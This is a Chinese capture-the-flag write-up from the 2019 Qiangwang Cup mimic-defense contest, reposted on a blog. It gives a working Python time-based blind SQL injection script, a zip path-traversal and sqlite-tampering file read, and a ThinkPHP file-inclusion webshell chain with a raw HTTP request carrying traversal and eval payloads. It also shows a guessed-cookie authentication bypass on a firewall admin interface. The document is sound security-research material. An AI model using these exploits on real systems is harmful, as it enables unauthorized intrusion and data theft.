# 2019强网杯拟态挑战赛Writeup



<u>知道创字KCSC</u> ● 于 2019-08-16 14:43:56 发布 ● 1507 ☆ 收藏 3 文章标签: <u>网络安全 CTF 拟态</u> 版权声明:本文为博主原创文章,遵循 <u>CC 4.0 BY-SA</u> 版权协议,转载请附上原文出处链接和本声明。 本文链接: <u>https://blog.csdn.net/qq\_43380549/article/details/99676439</u> 版权 作者: LoRexxar'@知道创字404实验室 原文链接: https://paper.seebug.org/932/

上周有幸去南京参加了强网杯拟态挑战赛,运气比较好拿了第二名,只是可惜是最后8分钟被爆了,差一点儿真是有点儿可惜。

有关于拟态的观念我会在后面讲防火墙黑盒攻击的 writeup 时再详细写,抛开拟态不谈,赛宁这次引入的比赛模式我觉得还蛮有趣的,白盒排位赛的排名决定你是不是能挑战白盒拟态,这样的多线并行挑战考验的除了你的实际水平,也给比赛本身平添了一些有趣的色彩(虽然我们是被这个设定坑了),虽然我还没想到这种模式如何应用在普通的ctf赛场上,但起码也是一个有趣的思路不是吗。

## Web 白盒

这题其实相对比赛中的其他题目来说,就显得有些太简单了,当时如果不是因为我们是第一轮挑战白盒的队伍,浪费了 30 分钟 时间,否则抢个前三血应该是没啥问题。

简单测试就发现,过滤了以下符号

,			
and &			
or			
for			
sub			
%			
^			
~			

此外还有一些字符串的过滤

hex, substring, union select

还有一些躺枪的(因为有or)

information\_schema

总结起来就是,未知表名、不能使用逗号、不能截断的时间盲注。其实实际技巧没什么新意,已经是玩剩下的东西了,具体直接 看 exp 吧

# coding=utf-8

import requests
import random
import hashlib
import time

s = requests.Session()

```
url='http://10.66.20.180:3002/article.php'
tables_count_num = 0
strings = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@!#$%*().<>1234567890{}"
def get content(url):
   for i in xrange(50):
            # payload = "1 and ((SELECT length(user) from admin limit 1)="+str(i)+") and (sleep(2))"
            # payload = "(select case when ((SELECT length(t.2) from (select 1,2,3,4 union select * from flag) 1
imit "+str(j)+") >"+str(i)+") then 0 else sleep(2) end)"
            payload = "(select case when ((SELECT length(t.4) from (select * from((select 1)a join(select 2)b jo
in (select 3)c join (select 4)d) union/**/select * from flag) as t limit 1 offset 1) ="+str(i)+") then sleep(2)
else 0 end)"
            if get_data(payload):
               print "[*] content_length: "+str(i)
               content_length = i
               break
    content = ""
    tmp_content = ""
   for i in range(1,content_length+1):
       for k in strings:
            tmp_content = content+str(k)
            tmp_content = tmp_content.ljust(content_length,'_')
            # payload = "1 and (SELECT ascii(mid(((SELECT user from admin limit 1))from("+str(i)+")))="+str(k+1)
+") and (sleep(2))"
            payload = "(select case when ((SELECT t.4 from (select * from((select 1)a join(select 2)b join (sele
ct 3)c join (select 4)d) union/**/select * from flag) as t limit 1 offset 1) like '"+tmp_content+"') then sleep(
2) else 0 end)"
            # print payload
            if get_data(payload):
               content += k
               print "[*] content: "+content
               break
    print "[*] content: " + content
def get_response(payload):
    s = requests.Session()
    username = "teststeststests1234\\"
    s.post()
def get_data(payload):
    u = url+'?id='+payload
    print u
   otime = time.time()
```

```
# print u.replace(' ','%20')
r = s.get(u)
rr = r.text
ptime = time.time()
if ptime-otime >2:
    return True
else:
    return False
```

get\_content(url)

### ezweb

这题觉得非常有意思,我喜欢这个出题思路,下面我们来一起整理下整个题目的思路。

首先是打开页面就是简单粗暴的登录,用户名只把.换成了\_,然后就直接存入了 session 中。

当我们在用户名中插入/的时候,我们就会发现爆了无法打开文件的错误,/被识别为路径分割,然后 sqlite 又没有太高的权限去 创建文件夹,所以就报错了,于是我们就得到了。

如果用户名被直接拼接到了数据库名字中,将.转化为\_,

#### ./dbs/mimic\_{username}.db

直接访问相应的路径,就可以下载到自己的 db 文件,直接本地打开就可以看到其中的数据。

对	user @main (mimicctf) - 表 🔠 user @main (mimicctf2) - 表
=	■ 开始事务 局 备注·▼筛选 具排序 日 号入 日 号出
id	filename joto
1	8799627345d5d890d11e5b92364d850a.txt 🛛 🗂 a:4:{s:9:"file_type";s:5:"image";s:9:"file_path";s:46:"./uploads/8799627345d5d890d11e5b!
2	8799627345d5d890d11e5b92364d850a.txt a:4:{s:9:"file_type";s:5:"image";s:9:"file_path";s:46:"./uploads/8799627345d5d890d11e5b!
3	8799627345d5d890d11e5b92364d850a.txt a:4:{s:9:"file_type";s:5:"image";s:9:"file_path";s:46:"./uploads/8799627345d5d890d11e5b!
4	8799627345d5d890d11e5b92364d850a.txt a:4:{s:9:"file_type";s:5:"image";s:9:"file_path";s:46:"./uploads/8799627345d5d890d11e5b!
5	8799627345d5d890d11e5b92364d850a.txt a:4:(s:9:"file_type";s:5:"image";s:9:"file_path";s:46:"./uploads/8799627345d5d890d11e5b!
6	5fc5e37c3120790425b2e28f1a02557d.txt a:4:(s:9:"file_type";s:5:"image";s:9:"file_path";s:46:"./uploads/5fc5e37c3120790425b2e28

数据库里很明显由 filename 做主键,后面的数据是序列化之后的字符串,主要有两个点,一个是 file\_type,这代表文件上传之后,服务端会检查文件的类型,然后做相应的操作,其次还会保存相应的文件路径。

抛开这边的数据库以后,我们再从黑盒这边继续分析。

当你上传文件的时候,文件名是 md5(全文件名)+最后一个.后的后缀拼接。

对于后缀的检查,如果点后为 ph 跟任何字符都会转为 mimic。

多传几次可以发现,后端的 file\_type 是由前端上传时设置的 content-type 决定的,但后端类型只有4种,其中 text 会直接展现文 件内容, image 会把文件路径传入 img 标签展示出来, zip 会展示压缩包里的内容, other 只会展示文件信息。

```
switch ($type){
        case 'text/php':
        case 'text/x-php':
            $this->status = 'failed';break;
        case 'text/plain':
            $this->info = @serialize($info);break;
        case 'image/png':
        case 'image/gif':
        case 'image/jpeg':
            $info['file_type'] = 'image';
            $this->info = @serialize($info);break;
        case 'application/zip':
            $info['file type'] = 'zip';
            $info['file_list'] = $this->handle_ziparchive();
            $this->info = @serialize($info);
            $this->flag = false;break;
        default:
            $info['file_type'] = 'other';
            $this->info = @serialize($info);break;
            break;
```

其中最特别的就是 zip,简单测试可以发现,不但会展示 zip 的内容,还会在

```
uploads/{md5(filename)}中解压 zip 中的内容。
```

测试发现,服务端限制了软连接,但是却允许跨目录,我们可以在压缩包中加入.../.../a,这个文件就会被解压到根目录,但可 惜文件后缀仍然收到之前对 ph 的过滤,我们没办法写入任何 php 文件。

```
private function handle_ziparchive() {
    try{
        $file list = array();
        $zip = new PclZip($this->file);
        $save_dir = './uploads/' . substr($this->filename, 0, strlen($this->filename) - 4);
        @mkdir($save_dir, 755);
        $res = $zip->extract(PCLZIP_OPT_PATH, $save_dir, PCLZIP_OPT_EXTRACT_DIR_RESTRICTION, '/var/www/html' , P
CLZIP OPT BY PREG, '/^(?!(.*)\.ph(.*)).*$/is');
        foreach ($res as $k => $v) {
            $file_list[$k] = array(
                'name' => $v['stored filename'],
                'size' => $this->get_size($v['size'])
            );
        }
        return $file_list;
    }
    catch (Exception $ex) {
        print r($ex);
        $this->status = 'failed';
    }
}
```

按照常规思路来说,我们一般会选择上传.htaccess和.user.ini,但很神奇的是,.htaccess因为 apache 有设置无法访问,不知道 是不是写进去了。.user.ini成功写入了。但是两种方式都没生效。

于是只能思考别的利用方式,这时候我们会想到数据被储存在sqlite中。

如果我们可以把 sqlite 文件中数据修改,然后将文件上传到服务端,我们不就能实现任意文件读取吗。

				manue .				18	10 A
≡	下 开如	は事务 📑 🏵 🗟	i注·▼筛选 ↓ 排	序 📑 📑	入 📑 导出				
id	filename	info							
•1	b75ae0b9	14(a:5:{s:9:*fi	le_type";s:3:"zip";s	s:9:"file_pat	th";s:46:"./up	oloads/b75ae	0b91404027	991c583f	ce3a2978
2	bebeee37	28{a:5:{s:9:"fi	le_type";s:3:"zip";s	s:9:"file_pat	th";s:46:"./up	oloads/bebee	e37288e699	f78f2e4d2	27ac4ceec
3	bebeee37	28{a:5:{s:9:"fi	le_type";s:3:"zip";s	s:9:"file_pa	th";s:46:"./uj	oloads/bebee	e37288e699	f78f2e4d2	27ac4ceec
4	bebeee37	28{a:5:{s:9:"fi	le_type";s:3:"zip";s	s:9:"file_pa	th";s:46:"./uj	oloads/bebee	e37288e699	f78f2e4d2	27ac4ceec
5	test	{s:9:"file_t	ype";s:4:"text";s:9:	"file_path"	';s:38."./uplo	ads////.	/etc/passv	vd";s:9:"file	e_size";s:3
6	test2 🥖	a:4:{s:9:"fi	le_type";s:4:"text"	;s9:"file_pa	ath ;s:46:"./u	ploads/dd/e	c931179c4d	cb6a8ffb8	b8786d20
7	test3	a:4:{s:9:"fi	le_type";s:4:"text"	;s:9:"file_pa	atn";s:38:"./u	ploads///	///etc/pa	asswd";s:9	"file_size
8	test4	a:4:{s:9:"fi	le_type";s:4:"text"	;s:9:"file_pa	ath";s:11:"/e	tc/passwd";s:	9:"file_size";s	:3:"13B";s	9:"file_ha
9	test5	a:4:{s:9:"fi	le_type";s:4:"text"	;s:9:"file_pa	ath";s:10:"./i	ndex.php*;s:9	"file_size";s:	3:"13B";s:9	9:"file_has
10	test6	a:4:{s:9:"fi	le_type";s:4:"text"	;s:9:"file_pa	ath";s:11:"./i	ndex.php*;s.9	"file_size";s:	3:"13B";s:9	9:"file_has
11	test7	a:4:{s:9:"fi	le_type";s:4:"text"	;s:9:"file_pa	ath";s:12:"./u	pload.php";s	9:"file size";	s:3:"13B";s	s:9:"file ha
12	test8	a:4:{s:9:"fi	le_type";s:4:"text"	;s:9:"file_pa	ath";s:5:"/fla	g";s:9:"file_siz	e":s:3:"13B";	s:9:"file_ha	sh";s:32:"

这里我直接读了 flag , 正常操作应该是要先读代码, 然后反序列化 getshell

```
public function __destruct() {
    if($this->flag){
        file_put_contents('./uploads/' . $this->filename , file_get_contents($this->file));
    }
    $this->conn->insert($this->filename, $this->info);
    echo json_encode(array('status' => $this->status));
}
```

最后拿到 flag

## 拟态防火墙

两次参加拟态比赛,再加上简单了解过拟态的原理,我大概可以还原目前拟态防御的原理,也逐渐佐证拟态防御的缺陷。

下面是我在攻击拟态防火墙时,探测到的后端结构,大概是这样的(不保证完全准确):



其中 Web 服务的执行体中,有3种服务端,分别为 nginx、apache 和 lighttpd 这3种。

Web 的执行体非常简陋,其形态更像是负载均衡的感觉,不知道是不是裁决机中规则没设置还是 Web 的裁决本身就有问题。

而防火墙的执行体就更诡异了,据现场反馈说,防火墙的执行体是开了2个,因为反馈不一致,所以返回到裁决机的时候会导致 互判错误...这种反馈尤其让我疑惑,这里的问题我在下面实际的漏洞中继续解释。

配合防火墙的漏洞,我们下面逐渐佐证和分析拟态的缺点。

我首先把攻击的过程分为两个部分,1是拿到 Web 服务执行体的 webshell,2是触发修改访问控制权限(比赛中攻击得分的要求)。

## **GetShell**

首先我不得不说真的是运气站在了我这头,第一界强网杯拟态挑战赛举办的时候我也参加了比赛,当时的比赛规则没这么复杂, 其中有两道拟态 Web 题目,其中一道没被攻破的就是今年的原题,拟态防火墙,使用的也是天融信的 Web 管理界面。

一年前虽然没日下来,但是幸运的是,一年前和一年后的攻击得分目标不一致,再加上去年赛后我本身也研究过,导致今年看到 这个题的时候,开局我就走在了前面。具体可以看下面这篇 wp 。

https://mp.weixin.qq.com/s/cfEqcb8YX8EuidFlqgSHqg

由于去年我研究的时候已经是赛后了,所以我并没有实际测试过,时至今日,我也不能肯定今年和去年是不是同一份代码。不过 这不影响我们可以简单了解架构。

https://github.com/YSheldon/ThinkPHP3.0.2\_NGTP

然后仔细阅读代码,代码结构为 Thinkphp3.2 架构,其中部分代码和远端不一致,所以只能尝试攻击。

在3.2中,Thinkphp 有一些危险函数操作,比如 display, display 可以直接将文件include 进来,如果函数参数可控,我们又能上 传文件,那么我们就可以 getshell。

全局审计代码之后我们发现在 /application/home/Controller/CommonControler.class.php



如果我们能让 type 返回为 html,就可以控制 display 函数。

搜索 type 可得 \$this->getAcceptType();

\$type = array(					
	'json'	=>	'application/json,text/x-json,application/jsonrequest,text/json',		
	'xml'	=>	'application/xml,text/xml,application/x-xml',		
	'html'	=>	<pre>'text/html,application/xhtml+xml,*/*',</pre>		
	'js'	=>	'text/javascript,application/javascript,application/x-javascript',		
	'css'	=>	'text/css',		
	'rss'	=>	'application/rss+xml',		
	'yaml'	=>	'application/x-yaml,text/yaml',		
	'atom'	=>	'application/atom+xml',		
	'pdf'	=>	'application/pdf',		
	'text'	=>	'text/plain',		
	'png'	=>	'image/png',		
	'jpg'	=>	'image/jpg,image/jpeg,image/pjpeg',		
	'gif'	=>	'image/gif',		
	'csv'	=>	'text/csv'		
	)				

只要将请求头中的 accept 设置好就可以了。

然后我们需要找一个文件上传,在UserController.class.php moduleImport函数里

```
} else {
          $config['param']['filename']=$_FILES["file"]["name"];
           $newfilename="./tmp/".$_FILES["file"]["name"];
           if($_POST['hid_import_file_type']) $config['param']['file-format'] = formatpost($_POST['hid_import_f
ile_type']);
           if($_POST['hid_import_loc']!='') $config['param']['group'] = formatpost($_POST['hid_import_loc']);
           if($_POST['hid_import_more_user']) $config['param']['type'] = formatpost($_POST['hid_import_more_use
r']);
           if($_POST['hid_import_login_addr']!='')$config['param']['address-name'] = formatpost($_POST['hid_imp
ort_login_addr']);
           if($_POST['hid_import_login_time']!='') $config['param']['timer-name'] = formatpost($_POST['hid_impo
rt_login_time']);
           if($ POST['hid import login area']!='') $config['param']['area-name'] = formatpost($ POST['hid impor
t_login_area']);
           if($_POST['hid_import_cognominal']) $config['param']['cognominal'] = formatpost($_POST['hid_import_c
ognominal']);
           //判断当前文件存储路径中是否含有非法字符
           if(preg_match('/\.\./',$newfilename)){
               exit('上传文件中不能存在"..."等字符');
           }
           var_dump($newfilename);
           if(move_uploaded_file($_FILES["file"]["tmp_name"],$newfilename)) {
               echo sendRequestSingle($config);
           } else
               $this->display('Default/auth_user_manage');
```

这里的上传只能传到 /tmp 目录下,而且不可以跨目录,所以我们直接传文件上去。

```
紧接着然后使用之前的文件包含直接包含该文件
```

```
GET /?c=Auth/User&a=index&assign=0&w=../../../../../tmp/index1&ddog=var_dump(scandir('/usr/local/apache
2/htdocs')); HTTP/1.1
Host: 172.29.118.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=spk6s3apvh5c54tj9ch052fp53; think_language=zh-CN
Upgrade-Insecure-Requests:
```

上传文件的时候要注意 seesion 和 token, token 可以从首页登陆页面获得。

至此我们成功获得了 webshell 。这里拿到 webshell 之后就会进入一段神奇的发现。

首先,服务端除了 /usr 以外没有任何的目录,其中 /usr/ 中除了3个服务端,也没有任何多余的东西。换言之就是没有 /bin, 也就是说并没有一个linux的基本环境,这里我把他理解为执行体,在他的外层还有别的代码来联通别的执行体。

由于没有 /bin ,导致服务端不能执行system函数,这大大影响了我的攻击效率,这可能也是我被反超的一个原因...

继续使用php eval shell,我们发现后端3个执行体分别为nginx\apache\lighthttpd,实际上来说都是在同一个文件夹下

/usr/local/apache2/htdocs
/usr/local/nginx/htdocs
/usr/local/lighttpd/htdocs

由于 Web 的服务器可以随便攻击,有趣的是,在未知情况下,服务端会被重置,但神奇的是,一次一般只会重置3个服务端的 一部分,这里也没有拟态裁决的判定,只要单纯的刷新就可以进入不同的后端,其感觉就好像是负载均衡一样。 这样我不禁怀疑起服务端的完成方式,大概像裁决机是被设定拼接在某个部分之前的,其裁决的内容也有所设定,到这里我们暂时把服务端架构更换。



阅读服务端代码

在拿到 shell 之后,主办方强调 Web 服务和题目无关,需要修改后端的访问控制权限,由于本地的代码和远程差异太大,所以首 先要拿到远端的代码。

从 /conf/menu.php 中可以获得相应功能的路由表。

```
. . .
'policy' => array(
   'text' => L('SECURE_POLICY'),
   'childs' => array(
       //访问控制
       'firewall' => array(
           'text' => L('ACCESS_CONTROL'),
           'url' => '?c=Policy/Interview&a=control_show',
           'img' => '28',
            'childs' => ''
       ),
       //地址转换
        'nat' => array(
           'text' => L('NAT'),
           'url' => '',
            'img' => '2',
           'childs' => array(
                'nat' => array(
                    'text' => 'NAT',
                    'url' => '?c=Policy/Nat&a=nat_show'
                )
```

其中设置防火墙访问控制权限的路由为 ?c=Policy/Interview&a=control\_show',

然后直接读远端的代码 /Controller/Policy/interviewController.class.php

```
其操作相关为
```

```
//添加策略
public function interviewAdd() {
    if (getPrivilege("firewall") == 1) {
        if ($_POST['action1']!='') $param['action'] = formatpost($_POST['action1']);
        if ($_POST['enable']!='') $param['enable'] = formatpost($_POST['enable']);
        if ($_POST['log1']!='') $param['log'] = formatpost($_POST['log1']);
        if ($_POST['srcarea']!='') $param['srcarea'] = '\''.formatpost($_POST['srcarea'],false).'\'';
        if ($_POST['dstarea']!='') $param['dstarea'] = '\''.formatpost($_POST['dstarea'],false).'\'';
        /*城名*/
```

```
直接访问这个路由发现权限不够,跟入 getPrivilege
```

```
/**
 * 获取权限模板, $module是否有权限
 * @param string $module
 * @return int 1:有读写权限, 2: 读权限, 0:没权限
 */
function getPrivilege($module) {
    if (!checkLogined()) {
        header('location:' . $_COOKIE['urlorg']);
        }
        return ngtos_ipc_privilege(NGTOS_MNGT_CFGD_PORT, M_TYPE_WEBUI, REQ_TYPE_AUTH, AUTH_ID, NGTOS_MNGT_IPC_NOWAIT
, $module);
```

```
一直跟到 checklogin
```

```
校验url合法性,是否真实登录
function checkLogined() {
   //获得cookie中的key
   $key = $_COOKIE['loginkey'];
11
         debugFile($key);
   //获得url请求中的authid
     $authid = $ GET['authid'];
11
         debugFile($authid);
11
   //检查session中是否存在改authid和key
   if (!empty($key) && $key == $_SESSION['auth_id'][AUTH_ID]) {
       return true;
   } else {
       return false;
   }
}
/*
```

发现对 cookie 中的 loginkey 操作直接对比了 auth\_id , id 值直接盲猜为1,于是绕过权限控制

添加相应的 cookie,就可以直接操作访问控制页面的所有操作,但是后端有拟态防御,所以访问 500.

至此,我无意中触发了拟态扰动...这完全是在我心理预期之外的触发,在我的理解中,我以为是我的参数配置错误,或者是这个 api还需要添加策略组,然后再修改。由于我无法肯定问题出在了哪,所以我一直试图想要看到这个策略修改页面,并正在为之 努力。(我认为我应该是在正常的操作功能,不会触发拟态扰动...) ps: 这里膜@zsx和@超威蓝猫,因为我无法加载 jquery,所以我看不到那个修改配置的页面是什么样的,但 ROIS 直接用 js 获 取页面内容渲染...

在仔细分析拟态的原理之后,我觉得如果这个功能可以被正常修改(在不被拟态拦截的情况下),那么我们就肯定触发了所有的 执行体(不可能只影响其中一台)。

那么我们反向思考过来,既然无法修改,就说明这个配置在裁决机背设置为白名单了,一旦修改就会直接拦截并返回 500!

所以我们当时重新思考了拟态防火墙的结构...我们发现,因为Web服务作为防火墙的管理端,在防火墙的配置中,至少应该有 裁决机的 ip , 搞不好可以直接获取防火墙的 ip 。



这时候如果我们直接向后端ip构造socket请求,那么我们就能造成一次降维打击。

只是可惜,因为没有 system shell,再加上不知道为什么蚁剑和菜刀有问题,我们只能花时间一个一个文件去翻,结果就是花了 大量的时间还没找到(远程的那份代码和我本地差异太大了),赛后想来,如果当场写一个脚本说不定就保住第一了2333

#### 关于拟态

在几次和拟态防御的较量中,拟态防御现在的形态模式也逐渐清晰了起来,从最开始的测信道攻击、ddos攻击无法防御,以及 关键的业务落地代价太大问题。逐渐到业务逻辑漏洞的防御缺陷。

拟态防御本身的问题越来越清晰起来,其最关键的业务落地代价太大问题,在现在的拟态防御中,逐渐使用放弃一些安全压力的 方式来缓解,现在的拟态防御更针对倾向于组件级安全问题的防御。假设在部分高防需求场景下,拟态作为安全生态的一环,如 果可以通过配置的方式,将拟态与传统的Waf、防火墙的手段相结合,不得不承认,在一定程度上,拟态的确放大了安全防御中 的一部分短板。拟态防御的后续发展怎么走,还是挺令人期待的。

欢迎关注我和专栏,我将定期搬运技术文章~

也欢迎访问我们:知道创宇



如果你想与我成为朋友,欢迎加微信kcsc818~